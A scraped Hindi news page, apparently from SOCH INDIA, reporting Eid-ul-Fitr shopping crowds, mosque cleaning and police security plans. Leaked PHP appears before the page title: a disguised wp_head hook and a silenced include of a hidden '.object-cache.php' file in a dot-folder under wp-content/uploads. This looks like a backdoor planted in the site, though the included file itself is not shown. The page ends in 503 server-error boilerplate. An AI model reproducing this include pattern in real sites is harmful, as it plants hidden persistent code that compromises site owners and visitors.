add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); ईद आज, बाजारों में लौटी रौनक, जमकर हुई खरीदारी – SOCH INDIA
Menu

धर्म / आस्था
ईद आज, बाजारों में लौटी रौनक, जमकर हुई खरीदारी

nobanner

ईद आज, बाजारों में लौटी रौनक, जमकर हुई खरीदारी

सोशल साइट पर चला मुबारकबाद का दौर

रमजान का तोहफा ईद पर्व गुरुवार को मनाया जाएगा। इसके लिए सभी तैयारियां पूरी कर ली गई हैं। विशेष नमाज ईदगाह पर अदा की जाएगी। बुधवार को ईद को लेकर बाजार में चहल-पहल है। शहर की अधिकांश रेडीमेड कपड़ा दुकान और किराना दुकानों पर इस समय भारी भीड़ नजर आई। इसी तरह चूड़ी की दुकानों पर भी दिनभर महिलाओं की जमकर भीड़ रही। वहीं शहर के सदर बाजार में देर रात तक मुस्लिम समाजजन खरीदी में जुटे रहे। इसके अलावा जिलेभर के ईदगाह और मस्जिदों के आसपास नगर पालिका और नगर पंचायत द्वारा सफाई कराई गई।

शहर मुस्लिम समुदाय के बच्चों से लेकर हर आयु वर्ग के लोगों में बुधवार को ईद-उल-फितर त्योहार की तैयारी को लेकर उत्साह देखते ही बन रहा था। बाजार में नये-नये पकवान( फेनी, सिवईयां व शीर खुर्मे) के साथ नये कपड़े की खरीदारी हो रही है. लोगों अपने रिश्तेदार और परिचितों को ईद की दावत देते हुए दिखे। दूसरी तरफ नगर पालिका द्वारा सफाई अभियान चलाकर शहर के ईदगाह और मस्जिदों की साफ-सफाई कराई गई। वहीं जिला प्रशासन ने ईद-उल-फितर का त्योहार शांति व सोहार्द के साथ मनाए जाने की अपील की है।

अंचल के बाजारों में रही भीड़:

अंचल के नगरों व ग्रामीण क्षेत्रों के प्रमुख बाजारों में रेडीमेड कपड़ों की दुकान पर भीड़ देखी जा रही। बुधवार को रुक-रुक कर हो रही बारिश के बीच भी शहरी व ग्रामीण क्षेत्रों में चहल पहल रही। हालांकि इस समुदाय का कुछ तबका परंपरागत परिधान की खरीदारी को प्राथमिकता दी।

एसपी और कलेक्टर ने लिया शहर की सुरक्षा व्यवस्था का जायजा

सुरक्षा के रहेंगे इंतजाम

एडीशनल एसपी अमृत मीणा ने बताया कि ईद के त्योहार पर सुरक्षा व्यवस्था के पुख्ता इंतजाम किए गए हैं। इस दौरान 3 डीएसपी रेंक के अधिकारी, आठ टीआई, 200 पुलिस जवान ड्यूटी पर लगाए गए हैं। वहीं जिले में त्योहार पर शांति बनाए रखने के लिए पुलिस थाना प्रभारियों को जिम्मेदारी दी गई है। थाना प्रभारी सुबह से ही अपने क्षेत्र में निगरानी रखेंगे। वहीं मोबाइल बैन पेट्रोलिंग करेगी। इसके अलावा सदर बाजार की ईदगाह पर नमाज अदा के वक्त ट्रैफिक एक तरफ का बंद रखा जाएगा। इसे अलावा एसपी और कलेक्टर भी शहर में घूमकर सुरक्षा व्यवस्था को देखेंगे। इस बीच वे ईदगाह और मस्जिदों पर पहुंचकर मुस्लिम समुदाय के लोगों को ईद की शुभकामनाएं देंगे।

ईद-उल-फितर त्योहार की मुबारकबाद मुस्लिम समुदाय के लोगों ने अपने रिश्तेदार और मित्रों को ईद से पहले वाट्सएप, फेसबुक, ट्विटर आदि के माध्यम से दी।

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.